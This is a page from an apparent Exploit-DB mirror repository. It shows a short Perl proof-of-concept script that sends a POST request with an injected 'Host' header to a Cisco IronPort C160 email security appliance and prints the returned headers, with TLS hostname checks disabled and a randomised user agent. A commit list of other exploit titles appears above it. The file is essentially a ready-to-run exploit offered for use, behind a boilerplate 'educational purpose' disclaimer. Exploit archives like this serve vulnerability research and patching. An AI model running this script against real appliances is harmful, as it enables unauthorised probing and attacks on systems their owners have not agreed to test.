bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/47329.pl
Offensive Security bc4836bfc1 DB: 2019-09-03 
12 changes to exploits/shellcodes

ChaosPro 2.0 - SEH Buffer Overflow
ChaosPro 2.1 - SEH Buffer Overflow
ChaosPro 3.1 - SEH Buffer Overflow
Kaseya VSA agent 9.5 - Privilege Escalation
Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection
IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read
Opencart 3.x - Cross-Site Scripting
Wordpress Plugin Event Tickets 4.10.7.1 - CSV Injection
Alkacon OpenCMS 10.5.x - Cross-Site Scripting
Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)
Alkacon OpenCMS 10.5.x - Local File inclusion
Craft CMS 2.7.9/3.2.5 - Information Disclosure
2019-09-03 05:02:22 +00:00

51 lines
No EOL
2.1 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl -w
#
#
# Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;
my $host = shift || 'https://192.168.1.1:443/';
print ("[+] Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection\n");
print ("===================================================================================\n");
print ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
print ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);
my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->cookie_jar($jar);
$browser->agent($user_agent);
my $request = HTTP::Request->new (POST => $host,
[ Content_Type => "application/x-www-form-urlencoded" ,
Referer => $host], " ");
$request->header("Host" => "Header-Injection");
my $content = $browser->request($request);
print $content->headers_as_string();
Reference in a new issue View git blame Copy permalink